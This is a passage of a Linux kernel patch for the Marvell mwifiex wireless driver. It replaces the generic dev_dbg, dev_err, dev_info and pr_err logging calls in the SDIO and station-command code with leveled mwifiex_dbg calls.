mwifiex_sdio_card_to_host_mp_aggr(struct mwifiex_adapter *adapter, rx_curr_single: if (f_do_rx_cur) { - dev_dbg(adapter->dev, "info: RX: port: %d, rx_len: %d\n", - port, rx_len); + mwifiex_dbg(adapter, INFO, "info: RX: port: %d, rx_len: %d\n", + port, rx_len); skb = mwifiex_alloc_dma_align_buf(rx_len, GFP_KERNEL | GFP_DMA); if (!skb) { - dev_err(adapter->dev, "single skb allocated fail,\t" - "drop pkt port=%d len=%d\n", port, rx_len); + mwifiex_dbg(adapter, ERROR, + "single skb allocated fail,\t" + "drop pkt port=%d len=%d\n", port, rx_len); if (mwifiex_sdio_card_to_host(adapter, &pkt_type, card->mpa_rx.buf, rx_len, adapter->ioport + port)) @@ -1376,9 +1415,9 @@ static int mwifiex_sdio_card_to_host_mp_aggr(struct mwifiex_adapter *adapter, goto error; if (!adapter->sdio_rx_aggr_enable && pkt_type == MWIFIEX_TYPE_AGGR_DATA) { - dev_err(adapter->dev, "drop wrong pkt type %d\t" - "current SDIO RX Aggr not enabled\n", - pkt_type); + mwifiex_dbg(adapter, ERROR, "drop wrong pkt type %d\t" + "current SDIO RX Aggr not enabled\n", + pkt_type); dev_kfree_skb_any(skb); return 0; } @@ -1386,7 +1425,8 @@ static int mwifiex_sdio_card_to_host_mp_aggr(struct mwifiex_adapter *adapter, mwifiex_decode_rx_packet(adapter, skb, pkt_type); } if (f_post_aggr_cur) { - dev_dbg(adapter->dev, "info: current packet aggregation\n"); + mwifiex_dbg(adapter, INFO, + "info: current packet aggregation\n"); /* Curr pkt can be aggregated */ mp_rx_aggr_setup(card, rx_len, port); } @@ -1458,7 +1498,7 @@ static int mwifiex_process_int_status(struct mwifiex_adapter *adapter) MWIFIEX_RX_DATA_BUF_SIZE) return -1; rx_len = (u16) (rx_blocks * MWIFIEX_SDIO_BLOCK_SIZE); - dev_dbg(adapter->dev, "info: rx_len = %d\n", rx_len); + mwifiex_dbg(adapter, INFO, "info: rx_len = %d\n", rx_len); skb = mwifiex_alloc_dma_align_buf(rx_len, GFP_KERNEL | GFP_DMA); if (!skb) @@ -1469,17 +1509,17 @@ static int mwifiex_process_int_status(struct mwifiex_adapter *adapter) if (mwifiex_sdio_card_to_host(adapter, &pkt_type, skb->data, skb->len, adapter->ioport | CMD_PORT_SLCT)) { - dev_err(adapter->dev, - "%s: failed to card_to_host", __func__); + mwifiex_dbg(adapter, ERROR, + "%s: failed to card_to_host", __func__); dev_kfree_skb_any(skb); goto term_cmd; } if ((pkt_type != MWIFIEX_TYPE_CMD) && (pkt_type != MWIFIEX_TYPE_EVENT)) - dev_err(adapter->dev, - "%s:Received wrong packet on cmd port", - __func__); + mwifiex_dbg(adapter, ERROR, + "%s:Received wrong packet on cmd port", + __func__); mwifiex_decode_rx_packet(adapter, skb, pkt_type); } @@ -1495,12 +1535,13 @@ static int mwifiex_process_int_status(struct 
mwifiex_adapter *adapter) } card->mp_wr_bitmap = bitmap; - dev_dbg(adapter->dev, "int: DNLD: wr_bitmap=0x%x\n", - card->mp_wr_bitmap); + mwifiex_dbg(adapter, INTR, + "int: DNLD: wr_bitmap=0x%x\n", + card->mp_wr_bitmap); if (adapter->data_sent && (card->mp_wr_bitmap & card->mp_data_port_mask)) { - dev_dbg(adapter->dev, - "info: <--- Tx DONE Interrupt --->\n"); + mwifiex_dbg(adapter, INTR, + "info: <--- Tx DONE Interrupt --->\n"); adapter->data_sent = false; } } @@ -1517,8 +1558,8 @@ static int mwifiex_process_int_status(struct mwifiex_adapter *adapter) adapter->cmd_sent = false; } - dev_dbg(adapter->dev, "info: cmd_sent=%d data_sent=%d\n", - adapter->cmd_sent, adapter->data_sent); + mwifiex_dbg(adapter, INTR, "info: cmd_sent=%d data_sent=%d\n", + adapter->cmd_sent, adapter->data_sent); if (sdio_ireg & UP_LD_HOST_INT_STATUS) { bitmap = (u32) card->mp_regs[reg->rd_bitmap_l]; bitmap |= ((u32) card->mp_regs[reg->rd_bitmap_u]) << 8; @@ -1529,40 +1570,45 @@ static int mwifiex_process_int_status(struct mwifiex_adapter *adapter) ((u32) card->mp_regs[reg->rd_bitmap_1u]) << 24; } card->mp_rd_bitmap = bitmap; - dev_dbg(adapter->dev, "int: UPLD: rd_bitmap=0x%x\n", - card->mp_rd_bitmap); + mwifiex_dbg(adapter, INTR, + "int: UPLD: rd_bitmap=0x%x\n", + card->mp_rd_bitmap); while (true) { ret = mwifiex_get_rd_port(adapter, &port); if (ret) { - dev_dbg(adapter->dev, - "info: no more rd_port available\n"); + mwifiex_dbg(adapter, INFO, + "info: no more rd_port available\n"); break; } len_reg_l = reg->rd_len_p0_l + (port << 1); len_reg_u = reg->rd_len_p0_u + (port << 1); rx_len = ((u16) card->mp_regs[len_reg_u]) << 8; rx_len |= (u16) card->mp_regs[len_reg_l]; - dev_dbg(adapter->dev, "info: RX: port=%d rx_len=%u\n", - port, rx_len); + mwifiex_dbg(adapter, INFO, + "info: RX: port=%d rx_len=%u\n", + port, rx_len); rx_blocks = (rx_len + MWIFIEX_SDIO_BLOCK_SIZE - 1) / MWIFIEX_SDIO_BLOCK_SIZE; if (rx_len <= INTF_HEADER_LEN || (rx_blocks * MWIFIEX_SDIO_BLOCK_SIZE) > card->mpa_rx.buf_size) { - dev_err(adapter->dev, "invalid rx_len=%d\n", - rx_len); + mwifiex_dbg(adapter, ERROR, + "invalid rx_len=%d\n", + rx_len); return -1; } rx_len = (u16) (rx_blocks * MWIFIEX_SDIO_BLOCK_SIZE); - dev_dbg(adapter->dev, "info: rx_len = %d\n", rx_len); + mwifiex_dbg(adapter, INFO, "info: rx_len = %d\n", + rx_len); if (mwifiex_sdio_card_to_host_mp_aggr(adapter, rx_len, port)) { - dev_err(adapter->dev, "card_to_host_mpa failed:" - " int status=%#x\n", sdio_ireg); + mwifiex_dbg(adapter, ERROR, + "card_to_host_mpa failed: int status=%#x\n", + sdio_ireg); goto term_cmd; } } @@ -1573,19 +1619,23 @@ static int mwifiex_process_int_status(struct mwifiex_adapter *adapter) term_cmd: /* terminate cmd */ if (mwifiex_read_reg(adapter, CONFIGURATION_REG, &cr)) - dev_err(adapter->dev, "read CFG reg failed\n"); + mwifiex_dbg(adapter, ERROR, "read CFG reg failed\n"); else - dev_dbg(adapter->dev, "info: CFG reg val = %d\n", cr); + mwifiex_dbg(adapter, INFO, + "info: CFG reg val = %d\n", cr); if (mwifiex_write_reg(adapter, CONFIGURATION_REG, (cr | 0x04))) - dev_err(adapter->dev, "write CFG reg failed\n"); + mwifiex_dbg(adapter, ERROR, + "write CFG reg failed\n"); else - dev_dbg(adapter->dev, "info: write success\n"); + mwifiex_dbg(adapter, INFO, "info: write success\n"); if (mwifiex_read_reg(adapter, CONFIGURATION_REG, &cr)) - dev_err(adapter->dev, "read CFG reg failed\n"); + mwifiex_dbg(adapter, ERROR, + "read CFG reg failed\n"); else - dev_dbg(adapter->dev, "info: CFG reg val =%x\n", cr); + mwifiex_dbg(adapter, INFO, + "info: CFG reg val =%x\n", cr); 
return -1; } @@ -1619,8 +1669,9 @@ static int mwifiex_host_to_card_mp_aggr(struct mwifiex_adapter *adapter, if (!card->mpa_tx.enabled || (card->has_control_mask && (port == CTRL_PORT)) || (card->supports_sdio_new_mode && (port == CMD_PORT_SLCT))) { - dev_dbg(adapter->dev, "info: %s: tx aggregation disabled\n", - __func__); + mwifiex_dbg(adapter, WARN, + "info: %s: tx aggregation disabled\n", + __func__); f_send_cur_buf = 1; goto tx_curr_single; @@ -1628,8 +1679,9 @@ static int mwifiex_host_to_card_mp_aggr(struct mwifiex_adapter *adapter, if (next_pkt_len) { /* More pkt in TX queue */ - dev_dbg(adapter->dev, "info: %s: more packets in queue.\n", - __func__); + mwifiex_dbg(adapter, INFO, + "info: %s: more packets in queue.\n", + __func__); if (MP_TX_AGGR_IN_PROGRESS(card)) { if (MP_TX_AGGR_BUF_HAS_ROOM(card, pkt_len)) { @@ -1659,8 +1711,9 @@ static int mwifiex_host_to_card_mp_aggr(struct mwifiex_adapter *adapter, } } else { /* Last pkt in TX queue */ - dev_dbg(adapter->dev, "info: %s: Last packet in Tx Queue.\n", - __func__); + mwifiex_dbg(adapter, INFO, + "info: %s: Last packet in Tx Queue.\n", + __func__); if (MP_TX_AGGR_IN_PROGRESS(card)) { /* some packs in Aggr buf already */ @@ -1677,8 +1730,9 @@ static int mwifiex_host_to_card_mp_aggr(struct mwifiex_adapter *adapter, } if (f_precopy_cur_buf) { - dev_dbg(adapter->dev, "data: %s: precopy current buffer\n", - __func__); + mwifiex_dbg(adapter, DATA, + "data: %s: precopy current buffer\n", + __func__); MP_TX_AGGR_BUF_PUT(card, payload, pkt_len, port); if (MP_TX_AGGR_PKT_LIMIT_REACHED(card) || @@ -1688,9 +1742,10 @@ static int mwifiex_host_to_card_mp_aggr(struct mwifiex_adapter *adapter, } if (f_send_aggr_buf) { - dev_dbg(adapter->dev, "data: %s: send aggr buffer: %d %d\n", - __func__, - card->mpa_tx.start_port, card->mpa_tx.ports); + mwifiex_dbg(adapter, DATA, + "data: %s: send aggr buffer: %d %d\n", + __func__, card->mpa_tx.start_port, + card->mpa_tx.ports); if (card->supports_sdio_new_mode) { u32 port_count; int i; @@ -1719,15 +1774,17 @@ static int mwifiex_host_to_card_mp_aggr(struct mwifiex_adapter *adapter, tx_curr_single: if (f_send_cur_buf) { - dev_dbg(adapter->dev, "data: %s: send current buffer %d\n", - __func__, port); + mwifiex_dbg(adapter, DATA, + "data: %s: send current buffer %d\n", + __func__, port); ret = mwifiex_write_data_to_card(adapter, payload, pkt_len, adapter->ioport + port); } if (f_postcopy_cur_buf) { - dev_dbg(adapter->dev, "data: %s: postcopy current buffer\n", - __func__); + mwifiex_dbg(adapter, DATA, + "data: %s: postcopy current buffer\n", + __func__); MP_TX_AGGR_BUF_PUT(card, payload, pkt_len, port); } @@ -1771,8 +1828,9 @@ static int mwifiex_sdio_host_to_card(struct mwifiex_adapter *adapter, if (type == MWIFIEX_TYPE_DATA) { ret = mwifiex_get_wr_port_data(adapter, &port); if (ret) { - dev_err(adapter->dev, "%s: no wr_port available\n", - __func__); + mwifiex_dbg(adapter, ERROR, + "%s: no wr_port available\n", + __func__); return ret; } } else { @@ -1781,8 +1839,9 @@ static int mwifiex_sdio_host_to_card(struct mwifiex_adapter *adapter, if (pkt_len <= INTF_HEADER_LEN || pkt_len > MWIFIEX_UPLD_SIZE) - dev_err(adapter->dev, "%s: payload=%p, nb=%d\n", - __func__, payload, pkt_len); + mwifiex_dbg(adapter, ERROR, + "%s: payload=%p, nb=%d\n", + __func__, payload, pkt_len); if (card->supports_sdio_new_mode) port = CMD_PORT_SLCT; @@ -1896,7 +1955,8 @@ static int mwifiex_register_dev(struct mwifiex_adapter *adapter) ret = sdio_set_block_size(card->func, MWIFIEX_SDIO_BLOCK_SIZE); sdio_release_host(func); if (ret) { - 
pr_err("cannot set SDIO block size\n"); + mwifiex_dbg(adapter, ERROR, + "cannot set SDIO block size\n"); return ret; } @@ -1977,7 +2037,8 @@ static int mwifiex_init_sdio(struct mwifiex_adapter *adapter) card->mp_tx_agg_buf_size, card->mp_rx_agg_buf_size); if (ret) { - dev_err(adapter->dev, "failed to alloc sdio mp-a buffers\n"); + mwifiex_dbg(adapter, ERROR, + "failed to alloc sdio mp-a buffers\n"); kfree(card->mp_regs); return -1; } @@ -2041,8 +2102,9 @@ mwifiex_update_mp_end_port(struct mwifiex_adapter *adapter, u16 port) card->curr_wr_port = reg->start_wr_port; - dev_dbg(adapter->dev, "cmd: mp_end_port %d, data port mask 0x%x\n", - port, card->mp_data_port_mask); + mwifiex_dbg(adapter, CMD, + "cmd: mp_end_port %d, data port mask 0x%x\n", + port, card->mp_data_port_mask); } static struct mwifiex_adapter *save_adapter; @@ -2059,7 +2121,7 @@ static void mwifiex_sdio_card_reset_work(struct mwifiex_adapter *adapter) * We run it in a totally independent workqueue. */ - pr_err("Resetting card...\n"); + mwifiex_dbg(adapter, WARN, "Resetting card...\n"); mmc_remove_host(target); /* 200ms delay is based on experiment with sdhci controller */ mdelay(200); @@ -2079,14 +2141,14 @@ rdwr_status mwifiex_sdio_rdwr_firmware(struct mwifiex_adapter *adapter, sdio_writeb(card->func, FW_DUMP_HOST_READY, card->reg->fw_dump_ctrl, &ret); if (ret) { - dev_err(adapter->dev, "SDIO Write ERR\n"); + mwifiex_dbg(adapter, ERROR, "SDIO Write ERR\n"); return RDWR_STATUS_FAILURE; } for (tries = 0; tries < MAX_POLL_TRIES; tries++) { ctrl_data = sdio_readb(card->func, card->reg->fw_dump_ctrl, &ret); if (ret) { - dev_err(adapter->dev, "SDIO read err\n"); + mwifiex_dbg(adapter, ERROR, "SDIO read err\n"); return RDWR_STATUS_FAILURE; } if (ctrl_data == FW_DUMP_DONE) @@ -2094,19 +2156,20 @@ rdwr_status mwifiex_sdio_rdwr_firmware(struct mwifiex_adapter *adapter, if (doneflag && ctrl_data == doneflag) return RDWR_STATUS_DONE; if (ctrl_data != FW_DUMP_HOST_READY) { - dev_info(adapter->dev, - "The ctrl reg was changed, re-try again!\n"); + mwifiex_dbg(adapter, WARN, + "The ctrl reg was changed, re-try again!\n"); sdio_writeb(card->func, FW_DUMP_HOST_READY, card->reg->fw_dump_ctrl, &ret); if (ret) { - dev_err(adapter->dev, "SDIO write err\n"); + mwifiex_dbg(adapter, ERROR, "SDIO write err\n"); return RDWR_STATUS_FAILURE; } } usleep_range(100, 200); } if (ctrl_data == FW_DUMP_HOST_READY) { - dev_err(adapter->dev, "Fail to pull ctrl_data\n"); + mwifiex_dbg(adapter, ERROR, + "Fail to pull ctrl_data\n"); return RDWR_STATUS_FAILURE; } @@ -2142,7 +2205,7 @@ static void mwifiex_sdio_fw_dump_work(struct mwifiex_adapter *adapter) mwifiex_pm_wakeup_card(adapter); sdio_claim_host(card->func); - dev_info(adapter->dev, "== mwifiex firmware dump start ==\n"); + mwifiex_dbg(adapter, MSG, "== mwifiex firmware dump start ==\n"); stat = mwifiex_sdio_rdwr_firmware(adapter, doneflag); if (stat == RDWR_STATUS_FAILURE) @@ -2152,7 +2215,7 @@ static void mwifiex_sdio_fw_dump_work(struct mwifiex_adapter *adapter) /* Read the number of the memories which will dump */ dump_num = sdio_readb(card->func, reg, &ret); if (ret) { - dev_err(adapter->dev, "SDIO read memory length err\n"); + mwifiex_dbg(adapter, ERROR, "SDIO read memory length err\n"); goto done; } @@ -2169,7 +2232,7 @@ static void mwifiex_sdio_fw_dump_work(struct mwifiex_adapter *adapter) for (i = 0; i < 4; i++) { read_reg = sdio_readb(card->func, reg, &ret); if (ret) { - dev_err(adapter->dev, "SDIO read err\n"); + mwifiex_dbg(adapter, ERROR, "SDIO read err\n"); goto done; } memory_size |= (read_reg 
<< i*8); @@ -2177,25 +2240,26 @@ static void mwifiex_sdio_fw_dump_work(struct mwifiex_adapter *adapter) } if (memory_size == 0) { - dev_info(adapter->dev, "Firmware dump Finished!\n"); + mwifiex_dbg(adapter, DUMP, "Firmware dump Finished!\n"); break; } - dev_info(adapter->dev, - "%s_SIZE=0x%x\n", entry->mem_name, memory_size); + mwifiex_dbg(adapter, DUMP, + "%s_SIZE=0x%x\n", entry->mem_name, memory_size); entry->mem_ptr = vmalloc(memory_size + 1); entry->mem_size = memory_size; if (!entry->mem_ptr) { - dev_err(adapter->dev, "Vmalloc %s failed\n", - entry->mem_name); + mwifiex_dbg(adapter, ERROR, "Vmalloc %s failed\n", + entry->mem_name); goto done; } dbg_ptr = entry->mem_ptr; end_ptr = dbg_ptr + memory_size; doneflag = entry->done_flag; - dev_info(adapter->dev, "Start %s output, please wait...\n", - entry->mem_name); + mwifiex_dbg(adapter, DUMP, + "Start %s output, please wait...\n", + entry->mem_name); do { stat = mwifiex_sdio_rdwr_firmware(adapter, doneflag); @@ -2207,26 +2271,26 @@ static void mwifiex_sdio_fw_dump_work(struct mwifiex_adapter *adapter) for (reg = reg_start; reg <= reg_end; reg++) { *dbg_ptr = sdio_readb(card->func, reg, &ret); if (ret) { - dev_err(adapter->dev, - "SDIO read err\n"); + mwifiex_dbg(adapter, ERROR, + "SDIO read err\n"); goto done; } if (dbg_ptr < end_ptr) dbg_ptr++; else - dev_err(adapter->dev, - "Allocated buf not enough\n"); + mwifiex_dbg(adapter, ERROR, + "Allocated buf not enough\n"); } if (stat != RDWR_STATUS_DONE) continue; - dev_info(adapter->dev, "%s done: size=0x%tx\n", - entry->mem_name, dbg_ptr - entry->mem_ptr); + mwifiex_dbg(adapter, DUMP, "%s done: size=0x%tx\n", + entry->mem_name, dbg_ptr - entry->mem_ptr); break; } while (1); } - dev_info(adapter->dev, "== mwifiex firmware dump end ==\n"); + mwifiex_dbg(adapter, MSG, "== mwifiex firmware dump end ==\n"); kobject_uevent_env(&adapter->wiphy->dev.kobj, KOBJ_CHANGE, env); @@ -2285,7 +2349,7 @@ mwifiex_sdio_reg_dump(struct mwifiex_adapter *adapter, char *drv_buf) if (!p) return 0; - dev_info(adapter->dev, "SDIO register DUMP START\n"); + mwifiex_dbg(adapter, MSG, "SDIO register DUMP START\n"); mwifiex_pm_wakeup_card(adapter); @@ -2351,13 +2415,13 @@ mwifiex_sdio_reg_dump(struct mwifiex_adapter *adapter, char *drv_buf) reg++; } - dev_info(adapter->dev, "%s\n", buf); + mwifiex_dbg(adapter, MSG, "%s\n", buf); p += sprintf(p, "%s\n", buf); } sdio_release_host(cardp->func); - dev_info(adapter->dev, "SDIO register DUMP END\n"); + mwifiex_dbg(adapter, MSG, "SDIO register DUMP END\n"); return p - drv_buf; } diff --git a/drivers/net/wireless/mwifiex/sta_cmd.c b/drivers/net/wireless/mwifiex/sta_cmd.c index a76d6a4340d0..037adcd1f484 100644 --- a/drivers/net/wireless/mwifiex/sta_cmd.c +++ b/drivers/net/wireless/mwifiex/sta_cmd.c @@ -77,8 +77,8 @@ static int mwifiex_cmd_mac_control(struct mwifiex_private *priv, struct host_cmd_ds_mac_control *mac_ctrl = &cmd->params.mac_ctrl; if (cmd_action != HostCmd_ACT_GEN_SET) { - dev_err(priv->adapter->dev, - "mac_control: only support set cmd\n"); + mwifiex_dbg(priv->adapter, ERROR, + "mac_control: only support set cmd\n"); return -1; } @@ -112,7 +112,8 @@ static int mwifiex_cmd_802_11_snmp_mib(struct mwifiex_private *priv, { struct host_cmd_ds_802_11_snmp_mib *snmp_mib = &cmd->params.smib; - dev_dbg(priv->adapter->dev, "cmd: SNMP_CMD: cmd_oid = 0x%x\n", cmd_oid); + mwifiex_dbg(priv->adapter, CMD, + "cmd: SNMP_CMD: cmd_oid = 0x%x\n", cmd_oid); cmd->command = cpu_to_le16(HostCmd_CMD_802_11_SNMP_MIB); cmd->size = cpu_to_le16(sizeof(struct host_cmd_ds_802_11_snmp_mib) - 1 
+ S_DS_GEN); @@ -129,11 +130,11 @@ static int mwifiex_cmd_802_11_snmp_mib(struct mwifiex_private *priv, le16_add_cpu(&cmd->size, sizeof(u16)); } - dev_dbg(priv->adapter->dev, - "cmd: SNMP_CMD: Action=0x%x, OID=0x%x, OIDSize=0x%x," - " Value=0x%x\n", - cmd_action, cmd_oid, le16_to_cpu(snmp_mib->buf_size), - le16_to_cpu(*(__le16 *) snmp_mib->value)); + mwifiex_dbg(priv->adapter, CMD, + "cmd: SNMP_CMD: Action=0x%x, OID=0x%x,\t" + "OIDSize=0x%x, Value=0x%x\n", + cmd_action, cmd_oid, le16_to_cpu(snmp_mib->buf_size), + le16_to_cpu(*(__le16 *)snmp_mib->value)); return 0; } @@ -356,9 +357,9 @@ mwifiex_cmd_802_11_hs_cfg(struct mwifiex_private *priv, (hscfg_param->conditions != cpu_to_le32(HS_CFG_CANCEL)) && ((adapter->arp_filter_size > 0) && (adapter->arp_filter_size <= ARP_FILTER_MAX_BUF_SIZE))) { - dev_dbg(adapter->dev, - "cmd: Attach %d bytes ArpFilter to HSCfg cmd\n", - adapter->arp_filter_size); + mwifiex_dbg(adapter, CMD, + "cmd: Attach %d bytes ArpFilter to HSCfg cmd\n", + adapter->arp_filter_size); memcpy(((u8 *) hs_cfg) + sizeof(struct host_cmd_ds_802_11_hs_cfg_enh), adapter->arp_filter, adapter->arp_filter_size); @@ -378,11 +379,11 @@ mwifiex_cmd_802_11_hs_cfg(struct mwifiex_private *priv, hs_cfg->params.hs_config.conditions = hscfg_param->conditions; hs_cfg->params.hs_config.gpio = hscfg_param->gpio; hs_cfg->params.hs_config.gap = hscfg_param->gap; - dev_dbg(adapter->dev, - "cmd: HS_CFG_CMD: condition:0x%x gpio:0x%x gap:0x%x\n", - hs_cfg->params.hs_config.conditions, - hs_cfg->params.hs_config.gpio, - hs_cfg->params.hs_config.gap); + mwifiex_dbg(adapter, CMD, + "cmd: HS_CFG_CMD: condition:0x%x gpio:0x%x gap:0x%x\n", + hs_cfg->params.hs_config.conditions, + hs_cfg->params.hs_config.gpio, + hs_cfg->params.hs_config.gap); } return 0; @@ -462,7 +463,7 @@ static int mwifiex_cmd_802_11_deauthenticate(struct mwifiex_private *priv, /* Set AP MAC address */ memcpy(deauth->mac_addr, mac, ETH_ALEN); - dev_dbg(priv->adapter->dev, "cmd: Deauth: %pM\n", deauth->mac_addr); + mwifiex_dbg(priv->adapter, CMD, "cmd: Deauth: %pM\n", deauth->mac_addr); deauth->reason_code = cpu_to_le16(WLAN_REASON_DEAUTH_LEAVING); @@ -540,9 +541,9 @@ mwifiex_set_keyparamset_wep(struct mwifiex_private *priv, } else if (!priv->wep_key[i].key_length) { continue; } else { - dev_err(priv->adapter->dev, - "key%d Length = %d is incorrect\n", - (i + 1), priv->wep_key[i].key_length); + mwifiex_dbg(priv->adapter, ERROR, + "key%d Length = %d is incorrect\n", + (i + 1), priv->wep_key[i].key_length); return -1; } } @@ -562,7 +563,8 @@ static int mwifiex_set_aes_key_v2(struct mwifiex_private *priv, u16 size, len = KEY_PARAMS_FIXED_LEN; if (enc_key->is_igtk_key) { - dev_dbg(adapter->dev, "%s: Set CMAC AES Key\n", __func__); + mwifiex_dbg(adapter, INFO, + "%s: Set CMAC AES Key\n", __func__); if (enc_key->is_rx_seq_valid) memcpy(km->key_param_set.key_params.cmac_aes.ipn, enc_key->pn, enc_key->pn_len); @@ -575,7 +577,8 @@ static int mwifiex_set_aes_key_v2(struct mwifiex_private *priv, enc_key->key_material, enc_key->key_len); len += sizeof(struct mwifiex_cmac_aes_param); } else { - dev_dbg(adapter->dev, "%s: Set AES Key\n", __func__); + mwifiex_dbg(adapter, INFO, + "%s: Set AES Key\n", __func__); if (enc_key->is_rx_seq_valid) memcpy(km->key_param_set.key_params.aes.pn, enc_key->pn, enc_key->pn_len); @@ -619,7 +622,7 @@ mwifiex_cmd_802_11_key_material_v2(struct mwifiex_private *priv, km->action = cpu_to_le16(cmd_action); if (cmd_action == HostCmd_ACT_GEN_GET) { - dev_dbg(adapter->dev, "%s: Get key\n", __func__); + mwifiex_dbg(adapter, INFO, 
"%s: Get key\n", __func__); km->key_param_set.key_idx = enc_key->key_index & KEY_INDEX_MASK; km->key_param_set.type = cpu_to_le16(TLV_TYPE_KEY_PARAM_V2); @@ -646,7 +649,7 @@ mwifiex_cmd_802_11_key_material_v2(struct mwifiex_private *priv, sizeof(struct mwifiex_ie_type_key_param_set_v2)); if (enc_key->key_disable) { - dev_dbg(adapter->dev, "%s: Remove key\n", __func__); + mwifiex_dbg(adapter, INFO, "%s: Remove key\n", __func__); km->action = cpu_to_le16(HostCmd_ACT_GEN_REMOVE); km->key_param_set.type = cpu_to_le16(TLV_TYPE_KEY_PARAM_V2); km->key_param_set.len = cpu_to_le16(KEY_PARAMS_FIXED_LEN); @@ -667,7 +670,7 @@ mwifiex_cmd_802_11_key_material_v2(struct mwifiex_private *priv, memcpy(km->key_param_set.mac_addr, mac, ETH_ALEN); if (enc_key->key_len <= WLAN_KEY_LEN_WEP104) { - dev_dbg(adapter->dev, "%s: Set WEP Key\n", __func__); + mwifiex_dbg(adapter, INFO, "%s: Set WEP Key\n", __func__); len += sizeof(struct mwifiex_wep_param); km->key_param_set.len = cpu_to_le16(len); km->key_param_set.key_type = KEY_TYPE_ID_WEP; @@ -710,7 +713,7 @@ mwifiex_cmd_802_11_key_material_v2(struct mwifiex_private *priv, key_info |= KEY_UNICAST | KEY_TX_KEY | KEY_RX_KEY; if (enc_key->is_wapi_key) { - dev_dbg(adapter->dev, "%s: Set WAPI Key\n", __func__); + mwifiex_dbg(adapter, INFO, "%s: Set WAPI Key\n", __func__); km->key_param_set.key_type = KEY_TYPE_ID_WAPI; memcpy(km->key_param_set.key_params.wapi.pn, enc_key->pn, PN_LEN); @@ -750,7 +753,8 @@ mwifiex_cmd_802_11_key_material_v2(struct mwifiex_private *priv, return mwifiex_set_aes_key_v2(priv, cmd, enc_key, km); if (enc_key->key_len == WLAN_KEY_LEN_TKIP) { - dev_dbg(adapter->dev, "%s: Set TKIP Key\n", __func__); + mwifiex_dbg(adapter, INFO, + "%s: Set TKIP Key\n", __func__); if (enc_key->is_rx_seq_valid) memcpy(km->key_param_set.key_params.tkip.pn, enc_key->pn, enc_key->pn_len); @@ -814,7 +818,7 @@ mwifiex_cmd_802_11_key_material_v1(struct mwifiex_private *priv, memset(&key_material->key_param_set, 0, sizeof(struct mwifiex_ie_type_key_param_set)); if (enc_key->is_wapi_key) { - dev_dbg(priv->adapter->dev, "info: Set WAPI Key\n"); + mwifiex_dbg(priv->adapter, INFO, "info: Set WAPI Key\n"); key_material->key_param_set.key_type_id = cpu_to_le16(KEY_TYPE_ID_WAPI); if (cmd_oid == KEY_INFO_ENABLED) @@ -860,7 +864,7 @@ mwifiex_cmd_802_11_key_material_v1(struct mwifiex_private *priv, } if (enc_key->key_len == WLAN_KEY_LEN_CCMP) { if (enc_key->is_igtk_key) { - dev_dbg(priv->adapter->dev, "cmd: CMAC_AES\n"); + mwifiex_dbg(priv->adapter, CMD, "cmd: CMAC_AES\n"); key_material->key_param_set.key_type_id = cpu_to_le16(KEY_TYPE_ID_AES_CMAC); if (cmd_oid == KEY_INFO_ENABLED) @@ -873,7 +877,7 @@ mwifiex_cmd_802_11_key_material_v1(struct mwifiex_private *priv, key_material->key_param_set.key_info |= cpu_to_le16(KEY_IGTK); } else { - dev_dbg(priv->adapter->dev, "cmd: WPA_AES\n"); + mwifiex_dbg(priv->adapter, CMD, "cmd: WPA_AES\n"); key_material->key_param_set.key_type_id = cpu_to_le16(KEY_TYPE_ID_AES); if (cmd_oid == KEY_INFO_ENABLED) @@ -892,7 +896,7 @@ mwifiex_cmd_802_11_key_material_v1(struct mwifiex_private *priv, cpu_to_le16(KEY_MCAST); } } else if (enc_key->key_len == WLAN_KEY_LEN_TKIP) { - dev_dbg(priv->adapter->dev, "cmd: WPA_TKIP\n"); + mwifiex_dbg(priv->adapter, CMD, "cmd: WPA_TKIP\n"); key_material->key_param_set.key_type_id = cpu_to_le16(KEY_TYPE_ID_TKIP); key_material->key_param_set.key_info = @@ -999,7 +1003,8 @@ static int mwifiex_cmd_802_11d_domain_info(struct mwifiex_private *priv, &domain_info->domain; u8 no_of_triplet = adapter->domain_reg.no_of_triplet; - 
dev_dbg(adapter->dev, "info: 11D: no_of_triplet=0x%x\n", no_of_triplet); + mwifiex_dbg(adapter, INFO, + "info: 11D: no_of_triplet=0x%x\n", no_of_triplet); cmd->command = cpu_to_le16(HostCmd_CMD_802_11D_DOMAIN_INFO); domain_info->action = cpu_to_le16(cmd_action); @@ -1235,8 +1240,9 @@ mwifiex_cmd_pcie_host_spec(struct mwifiex_private *priv, (u32)(card->sleep_cookie_pbase); host_spec->sleep_cookie_addr_hi = (u32)(((u64)(card->sleep_cookie_pbase)) >> 32); - dev_dbg(priv->adapter->dev, "sleep_cook_lo phy addr: 0x%x\n", - host_spec->sleep_cookie_addr_lo); + mwifiex_dbg(priv->adapter, INFO, + "sleep_cook_lo phy addr: 0x%x\n", + host_spec->sleep_cookie_addr_lo); } return 0; @@ -1263,7 +1269,8 @@ mwifiex_cmd_802_11_subsc_evt(struct mwifiex_private *priv, S_DS_GEN); subsc_evt->action = cpu_to_le16(subsc_evt_cfg->action); - dev_dbg(priv->adapter->dev, "cmd: action: %d\n", subsc_evt_cfg->action); + mwifiex_dbg(priv->adapter, CMD, + "cmd: action: %d\n", subsc_evt_cfg->action); /*For query requests, no configuration TLV structures are to be added.*/ if (subsc_evt_cfg->action == HostCmd_ACT_GEN_GET) @@ -1272,14 +1279,15 @@ mwifiex_cmd_802_11_subsc_evt(struct mwifiex_private *priv, subsc_evt->events = cpu_to_le16(subsc_evt_cfg->events); event_bitmap = subsc_evt_cfg->events; - dev_dbg(priv->adapter->dev, "cmd: event bitmap : %16x\n", - event_bitmap); + mwifiex_dbg(priv->adapter, CMD, "cmd: event bitmap : %16x\n", + event_bitmap); if (((subsc_evt_cfg->action == HostCmd_ACT_BITWISE_CLR) || (subsc_evt_cfg->action == HostCmd_ACT_BITWISE_SET)) && (event_bitmap == 0)) { - dev_dbg(priv->adapter->dev, "Error: No event specified " - "for bitwise action type\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Error: No event specified\t" + "for bitwise action type\n"); return -EINVAL; } @@ -1304,10 +1312,11 @@ mwifiex_cmd_802_11_subsc_evt(struct mwifiex_private *priv, rssi_tlv->abs_value = subsc_evt_cfg->bcn_l_rssi_cfg.abs_value; rssi_tlv->evt_freq = subsc_evt_cfg->bcn_l_rssi_cfg.evt_freq; - dev_dbg(priv->adapter->dev, "Cfg Beacon Low Rssi event, " - "RSSI:-%d dBm, Freq:%d\n", - subsc_evt_cfg->bcn_l_rssi_cfg.abs_value, - subsc_evt_cfg->bcn_l_rssi_cfg.evt_freq); + mwifiex_dbg(priv->adapter, EVENT, + "Cfg 